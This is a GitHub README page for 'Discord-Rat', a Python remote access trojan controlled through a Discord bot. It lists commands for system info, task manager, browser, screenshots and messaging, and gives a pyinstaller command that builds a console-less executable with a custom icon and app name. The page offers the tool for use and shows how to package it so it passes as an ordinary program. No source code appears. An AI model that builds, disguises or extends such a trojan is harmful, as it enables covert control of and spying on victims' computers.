Skip to content

Latest commit

 

History

History
12 lines (8 loc) · 318 Bytes

README.md

File metadata and controls

12 lines (8 loc) · 318 Bytes

Discord-Rat

Simple python rat with discord bot control

Bot commands: r/info, r/taskmgr, r/echo(broken), r/calc, r/brow, r/screen, r/spam(in work), r/msg

Build .exe with pyinstaller

pyinstaller --noconfirm --onefile --windowed --icon "icon file" --name "APP NAME" --collect-all "discord"  "script dir"